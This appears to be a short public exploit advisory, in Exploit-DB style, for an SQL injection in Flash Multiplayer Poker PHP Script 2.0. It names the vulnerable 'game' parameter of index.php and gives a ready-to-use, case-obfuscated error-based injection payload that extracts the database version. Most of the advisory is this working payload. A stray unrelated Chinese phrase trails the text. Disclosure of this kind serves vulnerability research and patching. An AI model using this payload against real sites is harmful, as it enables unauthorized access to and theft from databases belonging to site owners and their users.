# # # # # # Exploit Title: Flash Multiplayer Poker PHP Script 2.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://www.flashpoker.it/ # Software Link: https://www.codester.com/items/559/flash-poker-v2-multiplayer-poker-php-script # Demo: http://www.flashpoker.it/index/ # Version: 2.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?act_value=pkr_www&sub_act_value=pkr_viewgamehistory&game=[SQL] # # 1+Or+0x31+gRoUp+bY+ConCAT_WS(0x3a,VeRsiON(),fLoOR(rAnD(0)*2))+hAvING+MIn(0)+OR+0x31 # # Etc.. # # # # #
体验盒子
